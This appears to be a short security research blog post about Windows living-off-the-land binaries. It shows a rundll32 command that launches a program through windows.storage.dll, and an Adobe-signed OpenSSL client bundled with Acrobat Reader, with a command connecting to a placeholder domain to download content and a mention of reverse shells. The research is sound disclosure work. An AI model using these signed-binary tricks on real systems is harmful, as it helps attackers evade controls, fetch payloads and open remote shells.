This is a bit surprising, but the recent versions of windows.storage.dll export a number of functions identical with shell32.dll. In fact, shell32.dll imports these windows.storage.dll functions and is basically forwarding the execution to them, and just acting as a proxy.

Thanks to that, one can now call some of the shell32.dll functions directly from windows.storage.dll, f.ex. this well-known lolbin:

rundll32 c:\WINDOWS\system32\shell32.dll, ShellExec_RunDLL calc.exe

can be converted to:

rundll32 c:\WINDOWS\system32\windows.storage.dll, ShellExec_RunDLL calc.exe

Sometimes ‘research’ means browsing the folders of the ‘installed ‘target’ and… just executing programs present inside these directories to see what they do.

During this very engaging and fascinating activity I noticed that the program:

c:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\OSSLLibs\AdobeFips.exe

produces a very familiar output:

Yup, it is the OpenSSL client signed by Adobe:

Verified:       Signed
Signing date:   10:59 2024-01-13
Publisher:      Adobe Inc.
Company:        The OpenSSL Project, https://www.openssl.org/
Description:    OpenSSL application
Product:        The OpenSSL Toolkit
Prod version:   3.0.10
File version:   3.0.10
MachineType:    32-bit

so, one can run f.ex.:

AdobeFips.exe s_client -connect domain:port

to connect to the domain and download stuff (f.ex. via GET request), plus any other rich features OpenSSL offers (download, encryption, reverse shell, etc.).